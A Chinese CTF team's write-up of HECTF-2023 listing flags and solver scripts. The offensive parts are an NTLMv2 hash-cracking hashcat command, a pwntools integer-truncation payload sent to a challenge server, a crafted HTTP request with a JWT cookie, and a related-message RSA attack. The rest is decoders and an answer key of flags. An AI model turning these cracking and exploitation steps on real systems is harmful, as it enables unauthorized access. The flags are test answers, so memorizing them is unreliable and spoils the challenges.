恭喜师傅们在HECTF-2023中取得第10名的好成绩,解出题目数量为17道,师傅们太强了!!!
签到
HECTF{Welcome_To_HECTF_2023}
HECTF{河北省邯郸市永年区永年太极广场}
ezpcap
密码:X2z0Um23RF
斗地主
https://www.bilibili.com/video/BV1Lj41187kx/
small joker -> kaf
big joker -> wi1
HECTF{Dou_di_Zhu_uhZ_id_uoD_hEccctf_TY6d145A57R7WVz}
咖啡宝贝
恭喜weber获得最后的flag:
HECTF{java_ca_fei_bao_bei}
签退
NT?M
hashcat -m 5600 crackme.txt rockyou.txt
HECTF{fca812f055d5fdcd3a355b63ceaad991}
ezre
HECTF{T31s_1s_A_mAg1ca1_3h1ng}
Ez_Android
HECTF{jjjjjljjjlljlllkklkkkhhh}
ezzzvm
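# Byte table for the ezzzvm challenge; each entry decodes to one character
# of the flag printed below the script.
a = [
    0x4d, 0x42, 0x44, 0x51, 0x3f, 0x7c, 0x4f, 0x6a, 0x58,
    0x74, 0x34, 0x62, 0x6a, 0x74, 0x58, 0x6f, 0x34, 0x73,
    0x7e, 0x58, 0x74, 0x36, 0x6a, 0x75, 0x69, 0x34, 0x7a,
]

# Decode in place: add 1 first, then XOR with 6. The parentheses matter,
# because `^` binds more loosely than `+` only by accident of precedence
# here and the order of the two operations is not interchangeable.
for i, encoded in enumerate(a):
    a[i] = (encoded + 1) ^ 6
    # Emit the characters on one line, without separators.
    print(chr(a[i]), end='')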
HECTF{Vm_s3ems_v3ry_s1mpl3}
sign
from pwn import *
# Connect to the challenge service (pwntools tube).
conn = remote("101.133.164.228", 30380)

# -4294967230 == 66 - 2**32, so the value reads as 66 once it is truncated
# to 32 bits. NOTE(review): presumably the service checks the sign or range
# on a wider type and then narrows it; the challenge binary is not shown on
# this page, so confirm against it. The defensive fix for that class of bug
# is to range-check a parsed integer before converting it to a narrower type.
payload = '-4294967230'
conn.sendline(payload)

# Hand the session over to the terminal to read the service's reply.
conn.interactive()
伪装者
EZweb
POST /404.php HTTP/1.1
Host: 101.133.164.228:32385
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://101.133.164.228:32385
Connection: close
Referer: http://101.133.164.228:32385/404.php
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6IjExIn0.YrHwWF1RRyxqpta2G-dnwRRjoq53lCOLYVxv4l_BLMI; seed=976696390
Upgrade-Insecure-Requests: 1

sort=1
HECTF{Jia_You_Weber}
rsarsa
114514
#脚本1
#Sage
import
binascii
def attack(c1, c2, n, e):
    """Recover x from two RSA ciphertexts of affinely related plaintexts.

    c1 and c2 are treated as (30509*x + 13601)**e and (92095*x + 27065)**e
    modulo n for the same unknown x. Both polynomials then share the root x,
    so their GCD over Zmod(n) is expected to be the linear factor (X - x);
    the negated constant term of that monic GCD is returned.

    This only works because the relation between the two plaintexts is known
    and no randomized padding is applied; RSA with OAEP (or any properly
    randomized padding) removes the shared-root structure.

    NOTE(review): the result is meaningful only if the GCD is linear; the
    code does not check its degree.
    """
    PR.<x> = PolynomialRing(Zmod(n))

    # replace a,b,c,d -- the affine coefficients are specific to this challenge
    first_poly = (30509*x + 13601)**e - c1
    second_poly = (92095*x + 27065)**e - c2

    def monic_gcd(lhs, rhs):
        # Euclid's algorithm on polynomials; normalised to a leading
        # coefficient of 1 so the constant term can be read off directly.
        while rhs:
            lhs, rhs = rhs, lhs % rhs
        return lhs.monic()

    shared_factor = monic_gcd(first_poly, second_poly)
    # For a factor of the form (X - x) the constant term is -x.
    return -shared_factor[0]
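# Challenge values. `c` is not passed to attack(); it is kept as given.
c = 23001012057110779471190091625946693776382380529397302126337301229214301450335125076016991835054198112255974220434689958104931664098817350134656616154892781885504255726632558690544057380195511404078662094726952602350250840712610362029824982069179543810686494204685887486972937880502875441232004432323308734978847464589775857815430854038396134952486665687531579988133729365443247597395131516449487146786214227230853061720614077115599878358089377114269765796099004940883513036567103436154122335792598432012140232905658895014924069330265282364249236142072335363164451294973492092043110680377767954710822286121195290921259
n = 25797576442752368834409243494498462987370374608513814739930733437032797864549696772439769896270235017474841764016848627149724764584643408544417890463920153063835758878658712790547466715525246861709503145754424896044647787146006099053059124466248594151765065039034244830614724509092882854620642569723528913880146979990993657935598837645247839225413889995373643109990149255485373119338024345925311643249141660177285328457994476509430988280481564046398593906405870633323621548853838399385539924067139236445142933316057900841508972844270649504321178274091144241788883353514769368447833090379142367062327674855735832181241
c1 = 5702553209026762891130621254037294747819864952568824327221430749829654552175171307151888953348659971422228556686092434932000213695492351602755144510029319044193567051613888876933660356756790444392278614143455408803808095980542751023095024106689759843322130186219560734082292015929006937318400901378373771587448471762923415750064340829545587346927358411518874090282598069394946985795177419501659425500481799157093068337225389827654860680897913114945871197415129055139716514884716404289565297854681809258375973195355836553939670482515484347869258398517276876478311544109924573128946617113822561968330536525876279165313
c2 = 17562619948191690401152271053920025392401205523418067246455197241332062181407775133406742024747779181762812656501246379566147855594504112107873162350649668441267907193889705868572309785100582281795380779594946422800722070311908572538672508371123334385630310655242811756206073131919770939609347021343765434127086363844595938894714892990053114153402729297796655717510572619694559203260762574159375142757462082162882775921182437134358375300674547217425590072112733480640372328934982979603312597484512120618223179217692002851194538130349201457319160001114007059615596355221194709809437500052122684989302563103918409825040
e = 17

m1 = attack(c1, c2, n, e)

# unhexlify() rejects an odd number of hex digits, which happens whenever
# the top byte of the recovered integer is below 0x10; pad to a whole byte.
hex_digits = "%x" % int(m1)
if len(hex_digits) % 2:
    hex_digits = "0" + hex_digits
print(binascii.unhexlify(hex_digits))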
HECTF{r3411y_easy_R4nd0m_And_r3l4ted_m3554ge_att4ck}
littleblock
from
Crypto.Util.number import long_to_bytes, bytes_to_long
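# Ciphertext from the challenge: 36 bytes, i.e. nine 4-byte blocks.
# Each "xNN" pair is a \xNN byte escape; without the backslashes the literal
# is plain ASCII text of the wrong length and does not decrypt.
encrypted_message = b'\xa1\x14\xa66\x9c\x88\xe3\xeco?\xe2\x95\xbd\xcd\x1a2)i\xf5_)\x15H\xf2y\xec\x8d\xfc*KU\xefv\xdd\xd0X'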
# 逆向 circular_shift_left 函数
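def circular_shift_left(int_value, k, bit=32):
    """Rotate ``int_value`` left by ``k`` positions inside a ``bit``-wide word.

    The value is rendered as a zero-padded binary string of ``bit`` digits,
    the first ``k`` digits are moved to the end, and the result is parsed
    back into an int.

    Args:
        int_value: Non-negative integer that fits in ``bit`` bits.
        k: Number of positions to rotate by.
        bit: Word width in bits (default 32).

    Returns:
        The rotated value as an int.
    """
    # Pad to the requested width (not a fixed 32) so the `bit` argument is
    # honoured; leading zero bits must take part in the rotation.
    bin_value = bin(int_value)[2:].zfill(bit)
    bin_value = bin_value[k:] + bin_value[:k]
    return int(bin_value, 2)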
def dec_block(block):
    """Undo the outer layer of one 32-bit block and return it as bytes.

    The integer is XORed with 3279553481, rotated left by 21 bits, XORed
    with 1909693462, and converted with long_to_bytes.

    NOTE(review): a left rotation by 21 in a 32-bit word equals a right
    rotation by 11, so the forward cipher presumably rotated left by 11;
    the encryption routine is not shown on this page.
    """
    unmasked = block ^ 3279553481
    rotated = circular_shift_left(unmasked, 21)
    return long_to_bytes(rotated ^ 1909693462)
# 逆向 convert 函数
def myfill(num, fill_num):
    """Return ``num`` in binary, left-padded with zeros to ``fill_num`` digits."""
    digits = bin(num)[2:]  # drop the "0b" prefix
    return digits.zfill(fill_num)
# The two mask constants as 32-character binary strings, so that
# reverse_convert can slice them bit-for-bit alongside the block.
n1, n2 = (myfill(mask, 32) for mask in (2245263360, 2029229568))
def reverse_convert(c):
    """Undo four bit-mixing steps on one block and return the word as an int.

    ``c`` is a bytes object (the output of dec_block). It is turned into a
    32-character binary string and the steps are undone last-to-first
    (#4, #3, #2, #1). ``n1`` and ``n2`` are the module-level 32-character
    mask strings.

    NOTE(review): the forward convert() is not shown on this page; the step
    descriptions below are read off the slicing only. The shapes look like
    the inverses of x ^= x >> 19, x ^= (x << 17) & n1, x ^= (x << 9) & n2
    and x ^= x >> 13 -- confirm against the challenge source.
    """
    # Convert the byte block to a hex string, parse it as an integer, and
    # pad it to a 32-character binary string.
    c = c.hex()
    c = myfill(int(c, 16), 32)
    #4  low 13 bits := high 13 bits XOR low 13 bits; the high 19 bits are kept
    m1 = int(c[:13],2)^int(c[-13:],2)
    m1 = myfill(m1,13)
    c = c[:19]+m1
    #3  high 15 bits := high 15 bits XOR (low 15 bits AND high 15 bits of n1);
    #   the low 17 bits are kept
    m1 = int(c[:15],2)^(int(c[-15:],2)&int(n1[:15],2))
    m1 = myfill(m1,15)
    c = m1+c[15:]
    #2  rebuilt from the right in 9-bit groups: the lowest group is kept, and
    #   each higher group is XORed with (the group just recovered below it
    #   AND the matching bits of n2); the top 5 bits use the low 5 bits of m3
    m1 = c[-9:]
    m2 = int(c[-18:-9],2)^(int(m1,2)&int(n2[-18:-9],2))
    m2 = myfill(m2,9)
    m3 = int(c[-27:-18],2)^(int(m2,2)&int(n2[-27:-18],2))
    m3 = myfill(m3,9)
    m4 = int(c[:5],2)^(int(m3[-5:],2)&int(n2[:5],2))
    m4 = myfill(m4,5)
    c = m4+m3+m2+m1
    #1  bits 13..25 := bits 13..25 XOR bits 0..12; the last 6 bits are then
    #   XORed with the first 6 bits of that recovered middle part
    m1 = int(c[13:26],2)^int(c[:13],2)
    m1 = myfill(m1,13)
    m2 = int(m1[:6],2)^int(c[-6:],2)
    m2 = myfill(m2,6)
    c = c[:13]+m1+m2
    return int(c, 2)
# 解密整个消息
def my_decblock(encrypted_message):
    """Decrypt a message made of chained 4-byte blocks.

    Each ciphertext word is XORed with the previous ciphertext word (the
    first one with the bytes b'retu') *before* it goes through dec_block
    and reverse_convert. The recovered words are written back as 4 bytes
    each and concatenated.

    The input length must be a multiple of 4 (enforced with an assert).
    """
    assert len(encrypted_message) % 4 == 0
    previous_word = bytes_to_long(b'retu')
    plain_chunks = []
    for offset in range(0, len(encrypted_message), 4):
        cipher_word = bytes_to_long(encrypted_message[offset:offset + 4])
        inner_bytes = dec_block(cipher_word ^ previous_word)
        # reverse_convert returns an int; pad it back out to a full block.
        plain_chunks.append(long_to_bytes(reverse_convert(inner_bytes), 4))
        # The chaining value for the next block is this block's ciphertext.
        previous_word = cipher_word
    return b''.join(plain_chunks)
# 解密得到flag
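# Decrypt the whole message and show the result.
flag = my_decblock(encrypted_message)
print("Recovered flag:", flag)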
Recovered flag: b'HECTF{spodjoqw321jp3ij09adfiosofrga}'
大帝攻占福岛
def caesar_cipher_decrypt(char, shift):
    """Return ``char`` moved back by ``shift`` code points.

    No alphabet wrap-around is applied: the code point is simply decreased,
    so the result can be any character, not only a letter.
    """
    return chr(ord(char) - shift)
def split_and_decrypt(text, group_size):
    """Decrypt ``text`` in groups, with the shift growing by one per group.

    The text is cut into consecutive groups of ``group_size`` characters
    (the last one may be shorter). Group 1 is shifted back by 1, group 2 by
    2, and so on. Returns the list of decrypted groups.
    """
    decrypted_groups = []
    group_starts = range(0, len(text), group_size)
    for shift, start in enumerate(group_starts, start=1):
        chunk = text[start:start + group_size]
        plain = ''.join(caesar_cipher_decrypt(ch, shift) for ch in chunk)
        decrypted_groups.append(plain)
    return decrypted_groups
# 示例字符串
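# Ciphertext. Two characters lie outside printable ASCII ('{' + 6 == 0x81 and
# '}' + 8 == 0x85), so they are written as escapes; pasted as raw characters
# they get mangled by text encodings and no longer decode to the braces.
input_text = "zpvepoudbsgcdqwvjgocqg|rxrqo|feviefsyx}szwt|skqfl?NKIZL\x81YZUVfU|jslhyfzmiom\x85"

# Split into groups of 10 characters and decrypt each with its own shift.
result = split_and_decrypt(input_text, 10)

# Print the decrypted groups, numbered from 1.
for i, group in enumerate(result):
    print(f"Group {i+1}: {group}")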
HECTF{STOP_Nuclear_sewage}
我们仨
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
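xor_result = 113271863767201424639329153097952947311122854394813183532903131317262533549675
# One 16-byte AES block. The "xNN" pairs are \xNN byte escapes; without the
# backslashes the literal is not 16 bytes long and CBC decryption fails.
encrypted_flag = b'_1\x16\xc2;\xb1\xddy\x14\xdd\x14\xe5{\x19\x04:'

# long_to_bytes drops leading zero bytes, so the slicing below relies on
# xor_result being a full 32 bytes long.
xor_result_bytes = long_to_bytes(xor_result)

# The 32-byte key is the high 16 bytes repeated twice.
key_high = xor_result_bytes[:16]
secret_key = key_high + key_high

# The IV is the first half of the key XORed with the low 16 bytes.
xor_result_low = xor_result_bytes[-16:]
init_vector = bytes(a ^ b for a, b in zip(secret_key[:16], xor_result_low))

cipher = AES.new(secret_key, AES.MODE_CBC, init_vector)
decrypted_flag = cipher.decrypt(encrypted_flag)
print(f"Decrypted flag: {decrypted_flag}")
# Decrypted flag: b'RSAKEYISFTCEH\x00\x00\x01'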
e=65537
n=: 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c=:7650350848303138131393086727727533413756296838218347123997040508192472569084746342253915001354023303648603939313635106855058934664365503492172
没了 真没了 加油少年
keyisEa51stRsA
gIHkeIlRQp1fLeSWEqZJdOTO4aRYRB2OGRcBycHQ1OAdi6UEULYbwIvYh+0alYScSEoN4TOejgTjdPsetrURRlLX6dcifjX6VvLxY7TnMk7c8/xy17mybq/yNQf0vFGh8byC88bUeHian9dA2Qh6rRBYS1I7iNxM62RtCFZ+1OKeaqGIDjf3/VuPlbnCePYIY5FVs6xNXjkGh0m57t2QW4CoGI5lz6OcAAwg4AHP0d8CfeldOF/TogPwOiPaRlDbtHXCh54Bs5ZivV+jDerr0RQvCGYBFHYLJnvyrFtyZC9BxAQ8gQnGlWNDjE1V6BByUvJjpI9DcUyRSNN21rUWouOiLwtKX0BgDQkGH9PhtzhmGYI+R3lZJ4x30l+Xqweu
DES
CBC PKCS7 key:hectf iv:0000
你知道么?梵蒂冈的常住人口只有800人,同时,仅澳大利亚就有4700万只袋鼠。如果袋鼠决定入侵梵蒂冈,那么每一个梵蒂冈人要打58750只袋鼠,你不知道!你不在乎!你只关心你自己的
flagHECTF{DES_RSA_AES_WOMENSA_ZHENQIANG}
原文始发于微信公众号(齐鲁师院网络安全社团):HECTF-2023 WriteUp